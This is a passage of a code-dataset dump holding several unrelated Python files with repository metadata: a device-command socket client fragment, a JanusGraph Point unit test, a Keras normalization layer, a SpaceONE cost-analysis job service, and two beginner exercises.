a = key ^ i
key = i
result += chr(a)
return result
def send_cmd(string):
cmd=commands[string]
sock_tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock_tcp.settimeout(10)
sock_tcp.connect((ip, int(port)))
sock_tcp.send(encrypt(cmd))
data = sock_tcp.recv(2048)
sock_tcp.close()
decrypted = decrypt(data[4:])
return decrypted
| 583 | 0 | 69 |
6f5d3626cd1240dab8cb9ad41e0c04bd8af7f78b | 2,490 | py | Python | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2019-09-11T16:46:55.000Z | 2020-05-22T01:04:23.000Z | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | 14 | 2018-09-09T19:37:40.000Z | 2019-05-07T22:05:26.000Z | src/unittest/python/core/datatypes/Point_test.py | debasishdebs/janusgraph-py | c827e56e0dd175bad9324e2835516a4d4e92d47d | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # Copyright 2018 JanusGraph Python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from janusgraph_python.core.datatypes.GeoShape import GeoShape
class TestPoint(unittest.TestCase):
"""
This method is used to unit test when Invalid coordinates are passed to Point class.
"""
"""
This method is used to unit test when Valid coordinates are passed to Point class.
"""
"""
This method is used to unit test equality and non equality of 2 Point classes defined by __eq__ and __ne__ methods.
"""
"""
This method is used to unit test, once Point objects are created, it can return valid and correct coordinates.
"""
"""
This method is used to unit test the Shape of Object being created.
"""
| 27.977528 | 120 | 0.661044 | # Copyright 2018 JanusGraph Python Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
from janusgraph_python.core.datatypes.GeoShape import GeoShape
class TestPoint(unittest.TestCase):
def setUp(self):
self.latitude = 85.9
self.longitude = 171.2
self.point = GeoShape.Point(self.longitude, self.latitude)
pass
"""
This method is used to unit test when Invalid coordinates are passed to Point class.
"""
def test_invalid_point(self):
latitude = 95.9
longitude = 181.2
with self.assertRaises(ValueError):
GeoShape.Point(longitude, latitude)
pass
"""
This method is used to unit test when Valid coordinates are passed to Point class.
"""
def test_valid_point(self):
pt = self.point
point_representation = "POINT(lat: {}, lon: {})".format(self.latitude, self.longitude)
assert point_representation == pt.toString()
pass
"""
This method is used to unit test equality and non equality of 2 Point classes defined by __eq__ and __ne__ methods.
"""
def test_point_equality(self):
lat1 = 80.1
lon1 = 160.2
p1 = self.point
p2 = self.point
p3 = GeoShape.Point(lon1, lat1)
self.assertEqual(p1, p2)
self.assertNotEqual(p1, p3)
pass
"""
This method is used to unit test, once Point objects are created, it can return valid and correct coordinates.
"""
def test_coordinate_retrival(self):
p1 = self.point
self.assertEqual(self.latitude, p1.getLatitude())
self.assertEqual(self.longitude, p1.getLongitude())
self.assertEqual([self.latitude, self.longitude], p1.getCoordinates())
pass
"""
This method is used to unit test the Shape of Object being created.
"""
def test_shape(self):
p1 = self.point
self.assertEqual("POINT", p1.getShape())
pass
| 1,054 | 0 | 157 |
7c1d89c0c37fde16450073c78e9c7335060bddd7 | 4,991 | py | Python | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 429 | 2015-08-11T09:48:34.000Z | 2021-07-31T15:13:23.000Z | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 55 | 2015-09-10T11:57:58.000Z | 2021-04-24T14:13:31.000Z | drugresnet/seya/layers/imageproc.py | Naghipourfar/CCLE | cd557928a003200c683861b29c607942029bffb1 | [
"MIT"
] | 135 | 2015-08-31T17:52:26.000Z | 2022-02-07T05:31:12.000Z | """Note: this code was modified from:
https://github.com/lpigou/Theano-3D-ConvNet/blob/master/LICENSE
by @lpigou and collaborators
"""
import numpy as np
import theano.tensor as T
import keras.backend as K
from keras.layers.core import Layer
class NormLayer(Layer):
""" Normalization layer """
def __init__(self, method="lcn", kernel_size=9, threshold=1e-4,
nb_channels=3,
use_divisor=True, **kwargs):
"""
method: "lcn", "gcn", "mean"
LCN: local contrast normalization
kwargs:
kernel_size=9, threshold=1e-4, use_divisor=True
GCN: global contrast normalization
kwargs:
scale=1., subtract_mean=True, use_std=False, sqrt_bias=0.,
min_divisor=1e-8
MEAN: local mean subtraction
kwargs:
kernel_size=5
"""
super(NormLayer, self).__init__(**kwargs)
self.method = method
self.kernel_size = kernel_size
self.threshold = threshold
self.use_divisor = use_divisor
self.nb_channels = nb_channels
self.input = K.placeholder(ndim=4)
def lecun_lcn(self, X, kernel_size=7, threshold=1e-4, use_divisor=True):
"""
Yann LeCun's local contrast normalization
Orginal code in Theano by: Guillaume Desjardins
"""
filter_shape = (1, 1, kernel_size, kernel_size)
filters = self.gaussian_filter(
kernel_size).reshape(filter_shape)
# filters = shared(_asarray(filters, dtype=floatX), borrow=True)
filters = K.variable(filters)
convout = K.conv2d(X, filters, filter_shape=filter_shape,
border_mode='same')
# For each pixel, remove mean of kernel_sizexkernel_size neighborhood
new_X = X - convout
if use_divisor:
# Scale down norm of kernel_sizexkernel_size patch
sum_sqr_XX = K.conv2d(K.pow(K.abs(new_X), 2), filters,
filter_shape=filter_shape, border_mode='same')
denom = T.sqrt(sum_sqr_XX)
per_img_mean = denom.mean(axis=[2, 3])
divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)
divisor = T.maximum(divisor, threshold)
new_X /= divisor
return new_X
| 33.722973 | 83 | 0.559407 | """Note: this code was modified from:
https://github.com/lpigou/Theano-3D-ConvNet/blob/master/LICENSE
by @lpigou and collaborators
"""
import numpy as np
import theano.tensor as T
import keras.backend as K
from keras.layers.core import Layer
class NormLayer(Layer):
""" Normalization layer """
def __init__(self, method="lcn", kernel_size=9, threshold=1e-4,
nb_channels=3,
use_divisor=True, **kwargs):
"""
method: "lcn", "gcn", "mean"
LCN: local contrast normalization
kwargs:
kernel_size=9, threshold=1e-4, use_divisor=True
GCN: global contrast normalization
kwargs:
scale=1., subtract_mean=True, use_std=False, sqrt_bias=0.,
min_divisor=1e-8
MEAN: local mean subtraction
kwargs:
kernel_size=5
"""
super(NormLayer, self).__init__(**kwargs)
self.method = method
self.kernel_size = kernel_size
self.threshold = threshold
self.use_divisor = use_divisor
self.nb_channels = nb_channels
self.input = K.placeholder(ndim=4)
def get_output(self, train=False):
X = self.get_input()
out = []
if self.method == "lcn":
for i in range(self.nb_channels):
XX = X[:, i:i+1, :, :]
out += [self.lecun_lcn(XX, self.kernel_size, self.threshold,
self.use_divisor)]
out = K.concatenate(out, axis=1)
elif self.method == "gcn":
out = self.global_contrast_normalize(X)
elif self.method == "mean":
out = self.local_mean_subtraction(X, self.kernel_size)
else:
raise NotImplementedError()
return out
def lecun_lcn(self, X, kernel_size=7, threshold=1e-4, use_divisor=True):
"""
Yann LeCun's local contrast normalization
Orginal code in Theano by: Guillaume Desjardins
"""
filter_shape = (1, 1, kernel_size, kernel_size)
filters = self.gaussian_filter(
kernel_size).reshape(filter_shape)
# filters = shared(_asarray(filters, dtype=floatX), borrow=True)
filters = K.variable(filters)
convout = K.conv2d(X, filters, filter_shape=filter_shape,
border_mode='same')
# For each pixel, remove mean of kernel_sizexkernel_size neighborhood
new_X = X - convout
if use_divisor:
# Scale down norm of kernel_sizexkernel_size patch
sum_sqr_XX = K.conv2d(K.pow(K.abs(new_X), 2), filters,
filter_shape=filter_shape, border_mode='same')
denom = T.sqrt(sum_sqr_XX)
per_img_mean = denom.mean(axis=[2, 3])
divisor = T.largest(per_img_mean.dimshuffle(0, 1, 'x', 'x'), denom)
divisor = T.maximum(divisor, threshold)
new_X /= divisor
return new_X
def local_mean_subtraction(self, X, kernel_size=5):
filter_shape = (1, 1, kernel_size, kernel_size)
filters = self.mean_filter(kernel_size).reshape(filter_shape)
filters = K.variable(filters)
mean = K.conv2d(X, filters, filter_shape=filter_shape,
border_mode='same')
return X - mean
def global_contrast_normalize(self, X, scale=1., subtract_mean=True,
use_std=False, sqrt_bias=0., min_divisor=1e-6):
ndim = X.ndim
if ndim not in [3, 4]:
raise NotImplementedError("X.dim>4 or X.ndim<3")
scale = float(scale)
mean = X.mean(axis=ndim-1)
new_X = X.copy()
if subtract_mean:
if ndim == 3:
new_X = X - mean[:, :, None]
else:
new_X = X - mean[:, :, :, None]
if use_std:
normalizers = T.sqrt(sqrt_bias + X.var(axis=ndim-1)) / scale
else:
normalizers = T.sqrt(sqrt_bias + (new_X ** 2).sum(axis=ndim-1)) / scale
# Don't normalize by anything too small.
T.set_subtensor(normalizers[(normalizers < min_divisor).nonzero()], 1.)
if ndim == 3:
new_X /= (normalizers[:, :, None] + 1e-6)
else:
new_X /= (normalizers[:, :, :, None] + 1e-6)
return new_X
def gaussian_filter(self, kernel_shape):
x = np.zeros((kernel_shape, kernel_shape), dtype='float32')
def gauss(x, y, sigma=2.0):
Z = 2 * np.pi * sigma**2
return 1./Z * np.exp(-(x**2 + y**2) / (2. * sigma**2))
mid = np.floor(kernel_shape / 2.)
for i in xrange(0, kernel_shape):
for j in xrange(0, kernel_shape):
x[i, j] = gauss(i-mid, j-mid)
return x / sum(x)
def mean_filter(self, kernel_size):
s = kernel_size**2
x = np.repeat(1./s, s).reshape((kernel_size, kernel_size))
return x
| 2,493 | 0 | 135 |
bac0de269fde429f9cebf9a8fb0045c804ea4c9c | 21,142 | py | Python | src/spaceone/cost_analysis/service/job_service.py | whdalsrnt/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | 2 | 2021-12-22T05:31:18.000Z | 2021-12-23T11:47:29.000Z | src/spaceone/cost_analysis/service/job_service.py | whdalsrnt/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | 9 | 2022-02-10T00:58:28.000Z | 2022-03-23T11:12:47.000Z | src/spaceone/cost_analysis/service/job_service.py | spaceone-dev/cost-analysis | cf73e294bcd35fa47f988aab7f00ed4cd777aba5 | [
"Apache-2.0"
] | null | null | null | import copy
import datetime
import logging
from dateutil import rrule
from datetime import timedelta, datetime
from spaceone.core.service import *
from spaceone.core import utils, config
from spaceone.cost_analysis.error import *
from spaceone.cost_analysis.model.job_task_model import JobTask
from spaceone.cost_analysis.model.job_model import Job
from spaceone.cost_analysis.model.data_source_model import DataSource
from spaceone.cost_analysis.model.cost_model import CostQueryHistory
from spaceone.cost_analysis.manager.cost_manager import CostManager
from spaceone.cost_analysis.manager.job_manager import JobManager
from spaceone.cost_analysis.manager.job_task_manager import JobTaskManager
from spaceone.cost_analysis.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.cost_analysis.manager.data_source_manager import DataSourceManager
from spaceone.cost_analysis.manager.secret_manager import SecretManager
from spaceone.cost_analysis.manager.budget_manager import BudgetManager
from spaceone.cost_analysis.manager.budget_usage_manager import BudgetUsageManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
| 41.373777 | 129 | 0.597342 | import copy
import datetime
import logging
from dateutil import rrule
from datetime import timedelta, datetime
from spaceone.core.service import *
from spaceone.core import utils, config
from spaceone.cost_analysis.error import *
from spaceone.cost_analysis.model.job_task_model import JobTask
from spaceone.cost_analysis.model.job_model import Job
from spaceone.cost_analysis.model.data_source_model import DataSource
from spaceone.cost_analysis.model.cost_model import CostQueryHistory
from spaceone.cost_analysis.manager.cost_manager import CostManager
from spaceone.cost_analysis.manager.job_manager import JobManager
from spaceone.cost_analysis.manager.job_task_manager import JobTaskManager
from spaceone.cost_analysis.manager.data_source_plugin_manager import DataSourcePluginManager
from spaceone.cost_analysis.manager.data_source_manager import DataSourceManager
from spaceone.cost_analysis.manager.secret_manager import SecretManager
from spaceone.cost_analysis.manager.budget_manager import BudgetManager
from spaceone.cost_analysis.manager.budget_usage_manager import BudgetUsageManager
_LOGGER = logging.getLogger(__name__)
@authentication_handler
@authorization_handler
@mutation_handler
@event_handler
class JobService(BaseService):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.cost_mgr: CostManager = self.locator.get_manager('CostManager')
self.job_mgr: JobManager = self.locator.get_manager('JobManager')
self.job_task_mgr: JobTaskManager = self.locator.get_manager('JobTaskManager')
self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
self.ds_plugin_mgr: DataSourcePluginManager = self.locator.get_manager('DataSourcePluginManager')
@transaction(append_meta={'authorization.scope': 'SYSTEM'})
def create_jobs_by_data_source(self, params):
""" Create jobs by domain
Args:
params (dict): {}
Returns:
None
"""
for data_source_vo in self._get_all_data_sources():
try:
self._sync_data_source(data_source_vo)
except Exception as e:
_LOGGER.error(f'[create_jobs_by_data_source] sync error: {e}', exc_info=True)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['job_id', 'domain_id'])
def cancel(self, params):
""" Get job
Args:
params (dict): {
'job_id': 'str',
'domain_id': 'str'
}
Returns:
job_vo (object)
"""
job_id = params['job_id']
domain_id = params['domain_id']
job_vo = self.job_mgr.get_job(job_id, domain_id)
if job_vo.status != 'IN_PROGRESS':
raise ERROR_JOB_STATE(job_state=job_vo.status)
return self.job_mgr.change_canceled_status(job_vo)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['job_id', 'domain_id'])
def get(self, params):
""" Get job
Args:
params (dict): {
'job_id': 'str',
'domain_id': 'str',
'only': 'list
}
Returns:
job_vo (object)
"""
job_id = params['job_id']
domain_id = params['domain_id']
return self.job_mgr.get_job(job_id, domain_id, params.get('only'))
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['domain_id'])
@append_query_filter(['job_id', 'status', 'data_source_id', 'domain_id'])
@append_keyword_filter(['job_id'])
def list(self, params):
""" List jobs
Args:
params (dict): {
'job_id': 'str',
'status': 'str',
'data_source_id': 'str',
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.Query)'
}
Returns:
job_vos (object)
total_count
"""
query = params.get('query', {})
return self.job_mgr.list_jobs(query)
@transaction(append_meta={'authorization.scope': 'DOMAIN'})
@check_required(['query', 'domain_id'])
@append_query_filter(['domain_id'])
@append_keyword_filter(['job_id'])
def stat(self, params):
"""
Args:
params (dict): {
'domain_id': 'str',
'query': 'dict (spaceone.api.core.v1.StatisticsQuery)'
}
Returns:
values (list) : 'list of statistics data'
"""
query = params.get('query', {})
return self.job_mgr.stat_jobs(query)
@transaction
@check_required(['task_options', 'job_task_id', 'domain_id'])
def get_cost_data(self, params):
"""Execute task to get cost data
Args:
params (dict): {
'task_options': 'dict',
'job_task_id': 'str',
'domain_id': 'str'
}
Returns:
None
"""
task_options = params['task_options']
job_task_id = params['job_task_id']
domain_id = params['domain_id']
job_task_vo: JobTask = self.job_task_mgr.get_job_task(job_task_id, domain_id)
job_id = job_task_vo.job_id
if self._is_job_canceled(job_id, domain_id):
self.job_task_mgr.change_canceled_status(job_task_vo)
else:
job_task_vo = self.job_task_mgr.change_in_progress_status(job_task_vo)
try:
data_source_vo: DataSource = self.data_source_mgr.get_data_source(job_task_vo.data_source_id, domain_id)
plugin_info = data_source_vo.plugin_info.to_dict()
secret_id = plugin_info.get('secret_id')
options = plugin_info.get('options', {})
schema = plugin_info.get('schema')
endpoint, updated_version = self.ds_plugin_mgr.get_data_source_plugin_endpoint(plugin_info, domain_id)
secret_data = self._get_secret_data(secret_id, domain_id)
self.ds_plugin_mgr.initialize(endpoint)
start_dt = datetime.utcnow()
count = 0
is_canceled = False
_LOGGER.debug(f'[get_cost_data] start job ({job_task_id}): {start_dt}')
for costs_data in self.ds_plugin_mgr.get_cost_data(options, secret_data, schema, task_options):
results = costs_data.get('results', [])
for cost_data in results:
count += 1
self._check_cost_data(cost_data)
self._create_cost_data(cost_data, job_task_vo)
if self._is_job_canceled(job_id, domain_id):
self.job_task_mgr.change_canceled_status(job_task_vo)
is_canceled = True
break
else:
job_task_vo = self.job_task_mgr.update_sync_status(job_task_vo, len(results))
if not is_canceled:
end_dt = datetime.utcnow()
_LOGGER.debug(f'[get_cost_data] end job ({job_task_id}): {end_dt}')
_LOGGER.debug(f'[get_cost_data] total job time ({job_task_id}): {end_dt - start_dt}')
self.job_task_mgr.change_success_status(job_task_vo, count)
except Exception as e:
self.job_task_mgr.change_error_status(job_task_vo, e)
self._close_job(job_id, domain_id)
def _get_secret_data(self, secret_id, domain_id):
secret_mgr: SecretManager = self.locator.get_manager('SecretManager')
if secret_id:
secret_data = secret_mgr.get_secret_data(secret_id, domain_id)
else:
secret_data = {}
return secret_data
@staticmethod
def _check_cost_data(cost_data):
if 'currency' not in cost_data:
_LOGGER.error(f'[_check_cost_data] cost_data: {cost_data}')
raise ERROR_REQUIRED_PARAMETER(key='plugin_cost_data.currency')
if 'billed_at' not in cost_data:
_LOGGER.error(f'[_check_cost_data] cost_data: {cost_data}')
raise ERROR_REQUIRED_PARAMETER(key='plugin_cost_data.billed_at')
def _create_cost_data(self, cost_data, job_task_vo):
cost_data['original_currency'] = cost_data.get('currency', 'USD')
cost_data['original_cost'] = cost_data.get('cost', 0)
cost_data['job_id'] = job_task_vo.job_id
cost_data['data_source_id'] = job_task_vo.data_source_id
cost_data['domain_id'] = job_task_vo.domain_id
cost_data['billed_at'] = utils.iso8601_to_datetime(cost_data['billed_at'])
self.cost_mgr.create_cost(cost_data, execute_rollback=False)
def _is_job_canceled(self, job_id, domain_id):
job_vo: Job = self.job_mgr.get_job(job_id, domain_id)
if job_vo.status == 'CANCELED':
return True
else:
return False
def _close_job(self, job_id, domain_id):
job_vo: Job = self.job_mgr.get_job(job_id, domain_id)
no_preload_cache = job_vo.options.get('no_preload_cache', False)
if job_vo.remained_tasks == 0:
if job_vo.status == 'IN_PROGRESS':
try:
changed_start = None
for changed_vo in job_vo.changed:
self._delete_changed_cost_data(job_vo, changed_vo.start, changed_vo.end)
if changed_start is None or changed_start > changed_vo.start:
changed_start = changed_vo.start
self._aggregate_cost_data(job_vo, changed_start)
self._update_budget_usage(domain_id)
self.cost_mgr.remove_stat_cache(domain_id)
if not no_preload_cache:
self._preload_cost_stat_queries(domain_id)
self._update_last_sync_time(job_vo)
self.job_mgr.change_success_status(job_vo)
except Exception as e:
self.job_mgr.change_error_status(job_vo, e)
raise e
elif job_vo.status == 'ERROR':
self._rollback_cost_data(job_vo)
self.job_mgr.update_job_by_vo({'finished_at': datetime.utcnow()}, job_vo)
elif job_vo.status == 'CANCELED':
self._rollback_cost_data(job_vo)
def _update_budget_usage(self, domain_id):
budget_mgr: BudgetManager = self.locator.get_manager('BudgetManager')
budget_usage_mgr: BudgetUsageManager = self.locator.get_manager('BudgetUsageManager')
budget_vos = budget_mgr.filter_budgets(domain_id=domain_id)
for budget_vo in budget_vos:
budget_usage_mgr.update_cost_usage(budget_vo)
def _rollback_cost_data(self, job_vo: Job):
cost_vos = self.cost_mgr.filter_costs(data_source_id=job_vo.data_source_id, domain_id=job_vo.domain_id,
job_id=job_vo.job_id)
_LOGGER.debug(f'[_close_job] delete cost data created by job: {job_vo.job_id} (count = {cost_vos.count()})')
cost_vos.delete()
def _update_last_sync_time(self, job_vo: Job):
self.data_source_mgr: DataSourceManager = self.locator.get_manager('DataSourceManager')
data_source_vo = self.data_source_mgr.get_data_source(job_vo.data_source_id, job_vo.domain_id)
self.data_source_mgr.update_data_source_by_vo({'last_synchronized_at': job_vo.created_at}, data_source_vo)
def _delete_changed_cost_data(self, job_vo: Job, start, end):
query = {
'filter': [
{'k': 'billed_at', 'v': start, 'o': 'gte'},
{'k': 'data_source_id', 'v': job_vo.data_source_id, 'o': 'eq'},
{'k': 'domain_id', 'v': job_vo.domain_id, 'o': 'eq'},
{'k': 'job_id', 'v': job_vo.job_id, 'o': 'not'},
]
}
if end:
query['filter'].append({'k': 'billed_at', 'v': end, 'o': 'lt'})
_LOGGER.debug(f'[_delete_changed_cost_data] delete query: {query}')
cost_vos, total_count = self.cost_mgr.list_costs(query)
cost_vos.delete()
def _aggregate_cost_data(self, job_vo: Job, changed_start):
data_source_id = job_vo.data_source_id
domain_id = job_vo.domain_id
job_id = job_vo.job_id
changed_start = changed_start.replace(day=1)
for dt in rrule.rrule(rrule.MONTHLY, dtstart=changed_start, until=datetime.utcnow()):
billed_month = dt.strftime('%Y-%m')
self._aggregate_monthly_cost_data(data_source_id, domain_id, job_id, billed_month)
self._delete_aggregated_cost_data(data_source_id, domain_id, job_id, changed_start)
def _aggregate_monthly_cost_data(self, data_source_id, domain_id, job_id, billed_month):
query = {
'aggregate': [
{
'group': {
'keys': [
{'key': 'provider', 'name': 'provider'},
{'key': 'region_code', 'name': 'region_code'},
{'key': 'region_key', 'name': 'region_key'},
{'key': 'category', 'name': 'category'},
{'key': 'product', 'name': 'product'},
{'key': 'account', 'name': 'account'},
{'key': 'usage_type', 'name': 'usage_type'},
{'key': 'resource_group', 'name': 'resource_group'},
{'key': 'resource', 'name': 'resource'},
{'key': 'tags', 'name': 'tags'},
{'key': 'additional_info', 'name': 'additional_info'},
{'key': 'service_account_id', 'name': 'service_account_id'},
{'key': 'project_id', 'name': 'project_id'},
{'key': 'data_source_id', 'name': 'data_source_id'},
{'key': 'billed_month', 'name': 'billed_month'},
{'key': 'billed_year', 'name': 'billed_year'},
],
'fields': [
{'key': 'usd_cost', 'name': 'usd_cost', 'operator': 'sum'},
{'key': 'usage_quantity', 'name': 'usage_quantity', 'operator': 'sum'},
]
}
}
],
'filter': [
{'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
{'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
{'k': 'billed_month', 'v': billed_month, 'o': 'eq'},
]
}
_LOGGER.debug(f'[_aggregate_monthly_cost_data] query: {query}')
response = self.cost_mgr.stat_costs(query)
results = response.get('results', [])
for aggregated_cost_data in results:
aggregated_cost_data['data_source_id'] = data_source_id
aggregated_cost_data['job_id'] = job_id
aggregated_cost_data['domain_id'] = domain_id
self.cost_mgr.create_monthly_cost(aggregated_cost_data)
_LOGGER.debug(f'[_aggregate_monthly_cost_data] create monthly costs ({billed_month}): {job_id} (count = {len(results)})')
def _delete_aggregated_cost_data(self, data_source_id, domain_id, job_id, changed_start):
changed_start_month = changed_start.strftime('%Y-%m')
changed_start_year = changed_start.strftime('%Y')
# Delete Monthly Cost
query = {
'filter': [
{'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
{'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
{'k': 'job_id', 'v': job_id, 'o': 'not'},
{'k': 'billed_month', 'v': changed_start_month, 'o': 'gte'},
]
}
monthly_cost_vos, total_count = self.cost_mgr.list_monthly_costs(query)
monthly_cost_vos.delete()
_LOGGER.debug(f'[_delete_aggregated_cost_data] delete monthly costs after {changed_start_month}: {job_id}')
def _sync_data_source(self, data_source_vo: DataSource):
data_source_id = data_source_vo.data_source_id
domain_id = data_source_vo.domain_id
endpoint = self.ds_plugin_mgr.get_data_source_plugin_endpoint_by_vo(data_source_vo)
secret_id = data_source_vo.plugin_info.secret_id
options = data_source_vo.plugin_info.options
schema = data_source_vo.plugin_info.schema
secret_data = self._get_secret_data(secret_id, domain_id)
_LOGGER.debug(f'[create_jobs_by_data_source] sync data source: {data_source_id}')
params = {'last_synchronized_at': data_source_vo.last_synchronized_at}
self.ds_plugin_mgr.initialize(endpoint)
tasks, changed = self.ds_plugin_mgr.get_tasks(options, secret_data, schema, params)
_LOGGER.debug(f'[sync] get_tasks: {tasks}')
_LOGGER.debug(f'[sync] changed: {changed}')
# Add Job Options
job_vo = self.job_mgr.create_job(data_source_id, domain_id, {}, len(tasks), changed)
if self._check_duplicate_job(data_source_id, domain_id, job_vo):
self.job_mgr.change_error_status(job_vo, ERROR_DUPLICATE_JOB(data_source_id=data_source_id))
else:
if len(tasks) > 0:
for task in tasks:
job_task_vo = None
task_options = task['task_options']
try:
job_task_vo = self.job_task_mgr.create_job_task(job_vo.job_id, data_source_id, domain_id,
task_options)
self.job_task_mgr.push_job_task({
'task_options': task_options,
'job_task_id': job_task_vo.job_task_id,
'domain_id': domain_id
})
except Exception as e:
if job_task_vo:
self.job_task_mgr.change_error_status(job_task_vo, e)
else:
job_vo = self.job_mgr.change_success_status(job_vo)
self.data_source_mgr.update_data_source_by_vo({'last_synchronized_at': job_vo.created_at},
data_source_vo)
def _get_all_data_sources(self):
return self.data_source_mgr.filter_data_sources(state='ENABLED', data_source_type='EXTERNAL')
def _check_duplicate_job(self, data_source_id, domain_id, this_job_vo: Job):
query = {
'filter': [
{'k': 'data_source_id', 'v': data_source_id, 'o': 'eq'},
{'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
{'k': 'status', 'v': 'IN_PROGRESS', 'o': 'eq'},
{'k': 'job_id', 'v': this_job_vo.job_id, 'o': 'not'},
]
}
job_vos, total_count = self.job_mgr.list_jobs(query)
duplicate_job_time = datetime.utcnow() - timedelta(minutes=10)
for job_vo in job_vos:
if job_vo.created_at >= duplicate_job_time:
return True
else:
self.job_mgr.change_canceled_status(job_vo)
return False
def _preload_cost_stat_queries(self, domain_id):
cost_query_cache_time = config.get_global('COST_QUERY_CACHE_TIME', 7)
cache_time = datetime.utcnow() - timedelta(days=cost_query_cache_time)
query = {
'filter': [
{'k': 'domain_id', 'v': domain_id, 'o': 'eq'},
{'k': 'updated_at', 'v': cache_time, 'o': 'gte'},
]
}
_LOGGER.debug(f'[_preload_cost_stat_queries] cost_query_cache_time: {cost_query_cache_time} days')
history_vos, total_count = self.cost_mgr.list_cost_query_history(query)
for history_vo in history_vos:
_LOGGER.debug(f'[_preload_cost_stat_queries] create query cache: {history_vo.query_hash}')
self._create_cache_by_history(history_vo, domain_id)
def _create_cache_by_history(self, history_vo: CostQueryHistory, domain_id):
query = history_vo.query_options
granularity = history_vo.granularity
start = history_vo.start
end = history_vo.end
# Original Date Range
self._create_cache(copy.deepcopy(query), granularity, start, end, domain_id)
def _create_cache(self, query, granularity, start, end, domain_id):
query = self.cost_mgr.add_date_range_filter(query, granularity, start, end)
query_hash_with_date_range = utils.dict_to_hash(query)
if self.cost_mgr.is_monthly_cost(granularity, start, end):
self.cost_mgr.stat_monthly_costs_with_cache(query, query_hash_with_date_range, domain_id)
else:
self.cost_mgr.stat_costs_with_cache(query, query_hash_with_date_range, domain_id)
| 13,524 | 6,375 | 22 |
c343b4b46e44c45b2d46e35a4d1c43f3239bbcc0 | 335 | py | Python | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | Course/p_types/example_7.py | zevgenia/Python_shultais | e51c31de221c5e7f36ede857a960138009ec8a05 | [
"Apache-2.0"
] | null | null | null | # TODO: временный файл - удалить
s = "программа"
s2 = 'продукт'
print(s)
print(s2)
# Использование служебных спецсимволов.
print("Программа 1\nПрограмма 2\nПрограмма 3\n\tЧасть 1\n\tЧасть 2")
print(len("12345\n"))
print("""Программа 1
Программа 2
Программа 3
Часть 1
Часть 2""")
print(r"Программа 1\nПрограмма 2") | 16.75 | 68 | 0.689552 | # TODO: временный файл - удалить
s = "программа"
s2 = 'продукт'
print(s)
print(s2)
# Использование служебных спецсимволов.
print("Программа 1\nПрограмма 2\nПрограмма 3\n\tЧасть 1\n\tЧасть 2")
print(len("12345\n"))
print("""Программа 1
Программа 2
Программа 3
Часть 1
Часть 2""")
print(r"Программа 1\nПрограмма 2") | 0 | 0 | 0 |
0288f8ba32a91417b7204c9c3f6f6b75ee76504a | 441 | py | Python | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | 1 | 2022-03-19T22:50:12.000Z | 2022-03-19T22:50:12.000Z | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | null | null | null | python/linguagem-de-programacao/funcao-sem-retorno-sem-parametro/exercicio_2.py | BrenoPremoli/Faculdade | dcf5d106b10453224e37af830a53b2214af1d2ee | [
"MIT"
] | null | null | null | # 2. (Função sem retorno sem parâmetro) Faça uma função/método que leia dois valores positivos e apresente a soma dos N números existentes entre eles (inclusive).
main()
| 23.210526 | 162 | 0.641723 | # 2. (Função sem retorno sem parâmetro) Faça uma função/método que leia dois valores positivos e apresente a soma dos N números existentes entre eles (inclusive).
def somarNumeros():
soma = 0
a = int(input('Digite o primeiro número: '))
b = int(input('Digite o segundo número: '))
soma = soma + a
while a < b:
a = a + 1
soma = soma + a
print()
print('Soma: {}'.format(soma))
def main():
somarNumeros()
main()
| 221 | 0 | 46 |
